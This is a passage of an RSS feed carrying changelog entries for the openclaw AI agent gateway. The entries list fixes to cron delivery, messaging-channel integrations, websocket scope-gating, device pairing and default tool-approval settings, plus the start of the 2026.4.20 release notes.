<li>Gateway/websocket broadcasts: require <code>operator.read</code> (or higher) for chat, agent, and tool-result event frames so pairing-scoped and node-role sessions no longer passively receive session chat content, and scope-gate unknown broadcast events by default. Plugin-defined <code>plugin.*</code> broadcasts are scoped to operator.write/admin, and status/transport events (<code>heartbeat</code>, <code>presence</code>, <code>tick</code>, etc.) remain unrestricted. Per-client sequence numbers preserve per-connection monotonicity. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296861178" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69373" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69373/hovercard" href="https://github.com/openclaw/openclaw/pull/69373">#69373</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Agents/compaction: always reload embedded Pi resources through an explicit loader and reapply reserve-token overrides so runs without extension factories no longer silently lose compaction settings before session start. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268517877" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67146" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67146/hovercard" href="https://github.com/openclaw/openclaw/pull/67146">#67146</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ly85206559/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ly85206559">@ly85206559</a>.</li>
<li>Memory-core/dreaming: normalize sweep timestamps and reuse hashed narrative session keys for fallback cleanup so Dreaming narrative sub-sessions stop leaking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4266758639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67023" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67023/hovercard" href="https://github.com/openclaw/openclaw/pull/67023">#67023</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chiyouYCH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chiyouYCH">@chiyouYCH</a>.</li>
<li>Gateway/startup: delay HTTP bind until websocket handlers are attached, so immediate post-startup websocket health/connect probes no longer hit the startup race window. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059738654" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43392" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43392/hovercard" href="https://github.com/openclaw/openclaw/pull/43392">#43392</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dalefrieswthat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dalefrieswthat">@dalefrieswthat</a>.</li>
<li>Codex/app-server: release the session lane when a downstream consumer throws while draining the <code>turn/completed</code> notification, so follow-up messages after a Codex plugin reply stop queueing behind a stale lane lock. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280454021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67996" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67996/hovercard" href="https://github.com/openclaw/openclaw/issues/67996">#67996</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291737285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69072" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69072/hovercard" href="https://github.com/openclaw/openclaw/pull/69072">#69072</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayeshakhalid192007-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayeshakhalid192007-dev">@ayeshakhalid192007-dev</a>.</li>
<li>Codex/app-server: default approval handling to <code>on-request</code> so Codex harness sessions do not start with overly permissive tool approvals. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289424033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68721/hovercard" href="https://github.com/openclaw/openclaw/pull/68721">#68721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Cron/delivery: keep isolated cron chat delivery tools available, resolve <code>channel: "last"</code> targets from the gateway, show delivery previews in <code>cron list/show</code>, and avoid duplicate fallback sends after direct message-tool delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300215528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69587" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69587/hovercard" href="https://github.com/openclaw/openclaw/pull/69587">#69587</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/Telegram: key isolated direct-delivery dedupe to each cron execution instead of the reused session id, so recurring Telegram announce runs no longer report delivered while silently skipping later sends. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291263208" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69000" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69000/hovercard" href="https://github.com/openclaw/openclaw/pull/69000">#69000</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Models/Kimi: default bundled Kimi thinking to off and normalize Anthropic-compatible <code>thinking</code> payloads so stale session <code>/think</code> state no longer silently re-enables reasoning on Kimi runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290528589" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68907" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68907/hovercard" href="https://github.com/openclaw/openclaw/pull/68907">#68907</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
<li>Control UI/cron: keep the runtime-only <code>last</code> delivery sentinel from being materialized into persisted cron delivery and failure-alert channel configs when jobs are created or edited. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289970519" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68829" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68829/hovercard" href="https://github.com/openclaw/openclaw/pull/68829">#68829</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tianhaocui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tianhaocui">@tianhaocui</a>.</li>
<li>OpenAI/Responses: strip orphaned reasoning blocks before outbound Responses API calls so compacted or restored histories no longer fail on standalone reasoning items. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4152395683" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55787" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55787/hovercard" href="https://github.com/openclaw/openclaw/pull/55787">#55787</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/suboss87/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/suboss87">@suboss87</a>.</li>
<li>Cron/CLI: parse PowerShell-style <code>--tools</code> allow-lists the same way as comma-separated input, so <code>cron add</code> and <code>cron edit</code> no longer persist <code>exec read write</code> as one combined tool entry on Windows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290205612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68858" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68858/hovercard" href="https://github.com/openclaw/openclaw/pull/68858">#68858</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chen-zhang-cs-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chen-zhang-cs-code">@chen-zhang-cs-code</a>.</li>
<li>Browser/user-profile: let existing-session <code>profile="user"</code> tool calls auto-route to a connected browser node or use explicit <code>target="node"</code>, while still honoring explicit <code>target="host"</code> pinning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085904719" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48677" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48677/hovercard" href="https://github.com/openclaw/openclaw/issues/48677">#48677</a>)</li>
<li>Discord/slash commands: tolerate partial Discord channel metadata in slash-command and model-picker flows so partial channel objects no longer crash when channel names, topics, or thread parent metadata are unavailable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290804745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68953/hovercard" href="https://github.com/openclaw/openclaw/pull/68953">#68953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dutifulbob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dutifulbob">@dutifulbob</a>.</li>
<li>BlueBubbles: consolidate outbound HTTP through a typed <code>BlueBubblesClient</code> that resolves the SSRF policy once at construction so image attachments stop getting blocked on localhost and reactions stop getting blocked on private-IP BB deployments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023129569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/34749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/34749/hovercard" href="https://github.com/openclaw/openclaw/issues/34749">#34749</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194995882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59722" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59722/hovercard" href="https://github.com/openclaw/openclaw/issues/59722">#59722</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284406818" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68234" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68234/hovercard" href="https://github.com/openclaw/openclaw/pull/68234">#68234</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Cron/gateway: reject ambiguous announce delivery config at add/update time so invalid multi-channel or target-id provider settings fail early instead of persisting broken cron jobs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291352604" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69015" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69015/hovercard" href="https://github.com/openclaw/openclaw/pull/69015">#69015</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/main-session delivery: preserve <code>heartbeat.target="last"</code> through deferred wake queuing, gateway wake forwarding, and same-target wake coalescing so queued cron replies still return to the last active chat. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291431965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69021" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69021/hovercard" href="https://github.com/openclaw/openclaw/pull/69021">#69021</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/gateway: ignore disabled channels when announce delivery ambiguity is checked, and validate main-session delivery patches against the live cron service default agent so hot-reloaded agent config does not falsely reject valid updates. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291549667" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69040" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69040/hovercard" href="https://github.com/openclaw/openclaw/pull/69040">#69040</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Matrix/allowlists: hot-reload <code>dm.allowFrom</code> and <code>groupAllowFrom</code> entries on inbound messages while keeping config removals authoritative, so Matrix allowlist changes no longer require a channel restart to add or revoke a sender. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287996083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68546" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68546/hovercard" href="https://github.com/openclaw/openclaw/pull/68546">#68546</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/johnlanni/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/johnlanni">@johnlanni</a>.</li>
<li>BlueBubbles: always set <code>method</code> explicitly on outbound text sends (<code>"private-api"</code> when available, <code>"apple-script"</code> otherwise), and prefer Private API on macOS 26 even for plain text. Fixes silent delivery failure on macOS setups without Private API where an omitted <code>method</code> let BB Server fall back to version-dependent default behavior that silently drops the message (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241374191" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64480/hovercard" href="https://github.com/openclaw/openclaw/issues/64480">#64480</a>), and the AppleScript <code>-1700</code> error on macOS 26 Tahoe plain text sends (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123765293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53159" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53159/hovercard" href="https://github.com/openclaw/openclaw/issues/53159">#53159</a>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291714430" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69070" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69070/hovercard" href="https://github.com/openclaw/openclaw/pull/69070">#69070</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xqing3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xqing3">@xqing3</a>.</li>
<li>Matrix/commands: recognize slash commands that are prefixed with the bot's Matrix mention, so room messages like <code>@bot:server /new</code> trigger the command path without requiring custom mention regexes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288071010" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68570" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68570/hovercard" href="https://github.com/openclaw/openclaw/pull/68570">#68570</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nightq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nightq">@nightq</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/johnlanni/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/johnlanni">@johnlanni</a>.</li>
<li>Gateway/pairing: return reason-specific <code>PAIRING_REQUIRED</code> details, remediation hints, and request ids so unapproved-device and scope-upgrade failures surface actionable recovery guidance in the CLI and Control UI. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293547943" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69227" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69227/hovercard" href="https://github.com/openclaw/openclaw/pull/69227">#69227</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Agents/subagents: include requested role and runtime timing on subagent failure payloads so parent agents can correlate failed or timed-out child work. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289498591" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68726/hovercard" href="https://github.com/openclaw/openclaw/pull/68726">#68726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BKF-Gitty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BKF-Gitty">@BKF-Gitty</a>.</li>
<li>Gateway/sessions: reject stale agent-scoped sessions after an agent is removed from config while preserving legacy default-agent main-session aliases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255696700" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65986/hovercard" href="https://github.com/openclaw/openclaw/pull/65986">#65986</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>.</li>
<li>Doctor/gateway: surface pending device pairing requests, scope-upgrade approval drift, and stale device-token mismatch repair steps so <code>openclaw doctor --fix</code> no longer leaves pairing/auth setup failures unexplained. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293335700" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69210" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69210/hovercard" href="https://github.com/openclaw/openclaw/pull/69210">#69210</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/isolated-agent: preserve explicit <code>delivery.mode: "none"</code> message targets for isolated runs without inheriting implicit <code>last</code> routing, so agent-initiated Telegram sends keep their authored destination while bare <code>mode:none</code> jobs stay targetless. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292669912" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69153" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69153/hovercard" href="https://github.com/openclaw/openclaw/pull/69153">#69153</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Cron/isolated-agent: keep <code>delivery.mode: "none"</code> account-only or thread-only configs from inheriting a stale implicit recipient, so isolated runs only resolve message routing when the job authored an explicit <code>to</code> target. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292789440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69163" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69163/hovercard" href="https://github.com/openclaw/openclaw/pull/69163">#69163</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Gateway/TUI: retry session history while the local gateway is still finishing startup, so <code>openclaw tui</code> reconnects no longer fail on transient <code>chat.history unavailable during gateway startup</code> errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292804514" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69164" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69164/hovercard" href="https://github.com/openclaw/openclaw/pull/69164">#69164</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>BlueBubbles/reactions: fall back to <code>love</code> when an agent reacts with an emoji outside the iMessage tapback set (<code>love</code>/<code>like</code>/<code>dislike</code>/<code>laugh</code>/<code>emphasize</code>/<code>question</code>), so wider-vocabulary model reactions like <code>👀</code> still produce a visible tapback instead of failing the whole reaction request. Configured ack reactions still validate strictly via the new <code>normalizeBlueBubblesReactionInputStrict</code> path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243500979" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64693/hovercard" href="https://github.com/openclaw/openclaw/pull/64693">#64693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>BlueBubbles: prefer iMessage over SMS when both chats exist for the same handle, honor explicit <code>sms:</code> targets, and never silently downgrade iMessage-available recipients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210722336" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61781" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61781/hovercard" href="https://github.com/openclaw/openclaw/pull/61781">#61781</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmartin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmartin">@rmartin</a>.</li>
<li>Telegram/setup: require numeric <code>allowFrom</code> user IDs during setup instead of offering unsupported <code>@username</code> DM resolution, and point operators to <code>from.id</code>/<code>getUpdates</code> for discovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293079476" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69191" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69191/hovercard" href="https://github.com/openclaw/openclaw/pull/69191">#69191</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>GitHub Copilot/onboarding: default GitHub Copilot setup to <code>claude-opus-4.6</code> and keep the bundled default model list aligned, so new Copilot setups no longer start on the older <code>gpt-4o</code> default. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293294985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69207" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69207/hovercard" href="https://github.com/openclaw/openclaw/pull/69207">#69207</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Gateway/status: separate reachability, capability, and read-probe reporting so connect-only or scope-limited sessions no longer look fully healthy, and normalize SSH targets entered as <code>ssh user@host</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293399234" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69215" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69215/hovercard" href="https://github.com/openclaw/openclaw/pull/69215">#69215</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Slack: fix outbound replies failing with "unresolved SecretRef" for accounts configured via <code>file</code> or <code>exec</code> secret sources; the send path now tolerates the runtime snapshot retaining an unresolved channel SecretRef when a boot-resolved token override is already available. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290804972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68954/hovercard" href="https://github.com/openclaw/openclaw/pull/68954">#68954</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a>.</li>
<li>Control UI/device pairing: explain scope and role approval upgrades during reconnects, and show requested versus approved access in the Control UI and <code>openclaw devices</code> so broader reconnects no longer look like lost pairings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293523329" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69221" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69221/hovercard" href="https://github.com/openclaw/openclaw/pull/69221">#69221</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Gateway/Control UI: surface pending scope, role, and device-metadata pairing approvals in auth errors and Control UI hints so broader reconnects no longer look like random auth breakage. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293546193" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69226" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69226/hovercard" href="https://github.com/openclaw/openclaw/pull/69226">#69226</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.20]]></title>
<description><![CDATA[2026.4.20
Changes

Onboard/wizard: restyle the setup security disclaimer with a single yellow warning banner, section headings and bulleted checklists, and un-dim the note body so key guidance is easy to scan; add a loading spinner during the initial model catalog load so the wizard no longer goe...]]></description>
<link>https://tsecurity.de/de/3460969/downloads/openclaw-2026420/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3460969/downloads/openclaw-2026420/</guid>
<pubDate>Fri, 24 Apr 2026 12:30:58 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.20</h2>
<h3>Changes</h3>
<ul>
<li>Onboard/wizard: restyle the setup security disclaimer with a single yellow warning banner, section headings and bulleted checklists, and un-dim the note body so key guidance is easy to scan; add a loading spinner during the initial model catalog load so the wizard no longer goes blank while it runs; add an "API key" placeholder to provider API key prompts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299967312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69553" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69553/hovercard" href="https://github.com/openclaw/openclaw/pull/69553">#69553</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Agents/prompts: strengthen the default system prompt and OpenAI GPT-5 overlay with clearer completion bias, live-state checks, weak-result recovery, and verification-before-final guidance.</li>
<li>Models/costs: support tiered model pricing from cached catalogs and configured models, and include bundled Moonshot Kimi K2.6/K2.5 cost estimates for token-usage reports. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274674484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67605" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67605/hovercard" href="https://github.com/openclaw/openclaw/pull/67605">#67605</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sliverp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sliverp">@sliverp</a>.</li>
<li>Sessions/Maintenance: enforce the built-in entry cap and age prune by default, and prune oversized stores at load time so accumulated cron/executor session backlogs cannot OOM the gateway before the write path runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297469520" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69404" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69404/hovercard" href="https://github.com/openclaw/openclaw/pull/69404">#69404</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bobrenze-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bobrenze-bot">@bobrenze-bot</a>.</li>
